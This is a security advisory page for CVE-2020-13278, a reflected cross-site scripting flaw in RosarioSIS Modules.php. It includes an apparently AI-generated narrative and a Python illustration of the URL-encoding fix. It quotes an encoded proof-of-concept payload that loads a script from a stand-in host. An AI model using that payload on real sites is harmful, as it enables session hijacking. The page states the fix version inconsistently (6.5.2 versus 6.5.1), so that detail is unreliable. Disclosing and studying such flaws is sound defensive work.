Moderate severity · NVD Advisory · Published Aug 12, 2020 · Updated Aug 4, 2024

CVE-2020-13278

Description

Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Reflected XSS in RosarioSIS Student Information System < 6.5.1 allows attackers to execute arbitrary web script via crafted GET requests to Modules.php.

Vulnerability

CVE-2020-13278 is a reflected Cross-Site Scripting (XSS) vulnerability in the RosarioSIS Student Information System, affecting versions prior to 6.5.1. The root cause lies in the PreparePHP_SELF.php component, which fails to properly URL-encode keys in GET parameters. This flaw allows an attacker to inject arbitrary JavaScript or HTML tags via a specially crafted modname parameter in the Modules.php script [1][2].

Exploitation

The attack is remotely exploitable without authentication, but requires user interaction (the victim must visit a malicious link). A proof-of-concept URL demonstrates how the attacker can break out of the existing HTML context by injecting a payload such as %22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E [3]. The vulnerability is triggered when the server reflects the unsanitized input back to the victim’s browser.

Impact

Successful exploitation can lead to session hijacking, enabling the attacker to execute arbitrary requests with the victim’s privileges (potentially admin-level access). The CVSS v3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) confirms low confidentiality and integrity impact, but the attack vector is network-based and can have significant consequences if an admin is targeted [1][3].

Mitigation

The issue was fixed in version 6.5.2 by applying _myURLEncode() to the key values in PreparePHP_SELF.php, as shown in the corresponding Git commit [2]. Users are strongly advised to update to RosarioSIS 6.5.2 or later. No known workarounds are documented.
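As an added illustration (not RosarioSIS code), the following Python models the pattern the advisory describes: a self-URL rebuilt from GET parameters where only values were encoded, beside the fixed form that encodes keys as well, plus a check a defender can run over generated URLs. The function names, the sample parameters and the check are assumptions constructed for this example; the real fix lives in PreparePHP_SELF.php and uses _myURLEncode().

```python
from urllib.parse import quote, parse_qsl
import html

# Constructed sample: GET parameters as (key, value) pairs, the way a PHP
# app sees $_GET. The second key carries characters that would close an
# HTML attribute if copied verbatim into the page.
SAMPLE_PARAMS = [
    ("modname", "Users/User.php"),
    ('"><b>x</b>', "1"),  # constructed hostile key (not an attack string from the page)
]


def build_self_url_value_only(params):
    """Models the pre-fix pattern: values are URL-encoded, keys are copied as-is."""
    return "Modules.php?" + "&".join(f"{k}={quote(v, safe='')}" for k, v in params)


def build_self_url_fixed(params):
    """Models the fix: both key and value are URL-encoded before the URL is rebuilt."""
    return "Modules.php?" + "&".join(
        f"{quote(k, safe='')}={quote(v, safe='')}" for k, v in params
    )


def embed_in_attribute(url):
    """Defense in depth: HTML-escape whatever lands in an attribute, independent of URL encoding."""
    return f'<a href="{html.escape(url, quote=True)}">self</a>'


HTML_BREAKOUT = set("\"'<>")


def has_raw_breakout_chars(url):
    """Check for generated URLs: True if an HTML-significant character survives unencoded in the query."""
    query = url.split("?", 1)[1] if "?" in url else ""
    return any(c in HTML_BREAKOUT for c in query)


def roundtrip_ok(params):
    """Encoding keys must not change what the server decodes: parse the fixed URL back."""
    query = build_self_url_fixed(params).split("?", 1)[1]
    return parse_qsl(query) == list(params)
```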

References

  • [1] NVD - CVE-2020-13278
  • [2] GitLab Commit: Fix #282 XSS URL encode key
  • [3] GitLab Issue: Reflected Cross-Site Scripting vulnerability

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                                  | Affected versions | Patched versions
francoisjacquet/rosariosis (Packagist)   | < 6.5.1           | 6.5.1
